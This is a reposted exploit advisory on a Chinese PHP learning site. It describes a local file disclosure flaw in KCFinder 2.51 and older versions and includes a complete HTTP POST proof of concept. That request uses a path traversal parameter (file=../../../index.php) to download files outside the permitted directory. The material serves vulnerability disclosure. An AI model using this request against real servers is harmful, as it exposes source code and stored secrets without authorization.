网站地图    收藏   

主页 > 后端 > 网站安全 >

KCFinder 2.51本地文件泄露 - 网站安全 - 自学php

来源:自学PHP网    时间:2015-04-17 10:15 作者: 阅读:

[导读] # 标题: KCFinder Local File Disclosure# 作者: DaOne# 官网: http://kcfinder.sunhater.com/# 影响版本: 2.51 + old versions[#] Tested on their own ......

# 标题: KCFinder Local File Disclosure
# 作者: DaOne
# 官网: http://kcfinder.sunhater.com/
# 影响版本: 2.51 + old versions
—————————————————

[#] Tested on their own demo…

-PoC-
POST http:// www.2cto.com /kcfinder/browse.php?type=images&lng=en&act=download HTTP/1.1
Host: server
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 51

dir=images/Photos+from+Bulgaria&file=../../../index.php 

 

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论